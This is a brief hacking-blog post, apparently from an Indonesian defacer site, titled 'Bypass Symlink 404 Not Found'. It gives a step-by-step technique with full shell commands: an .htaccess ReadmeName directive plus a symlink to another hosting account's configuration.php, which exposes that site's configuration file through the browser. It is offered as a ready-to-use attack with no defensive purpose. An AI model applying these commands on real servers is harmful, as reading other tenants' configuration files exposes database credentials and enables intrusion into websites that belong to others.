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Bypass Symlink 404 Not Found

[+] Post Title :Bypass Symlink 404 Not Found
[+] Date : Kamis, 19 Januari 2017
[+] Author : Administrator
[+] Link : http://0xdark.blogspot.co.id/2017/01/bypass-symlink-404-not-found.html
[+] Type : Bypass

Whenever you got symlink 404 not found like this

How to bypas ?
1. Create a new directory , give name "asu"

2. Make a new .htaccess file in directory "asu"
3. Write this code to .htaccess file
    "ReadmeName 0x.txt"
4. Symlink config file to 0x.txt in directory "asu"
5. Open it on browser

Using Command

mkdir asu
echo 'ReadmeName 0x.txt'>asu/.htaccess
ln -s /home/amigamia/public_html/configuration.php asu/0x.txt

Thankyou :)

@Sumber : 0xDark

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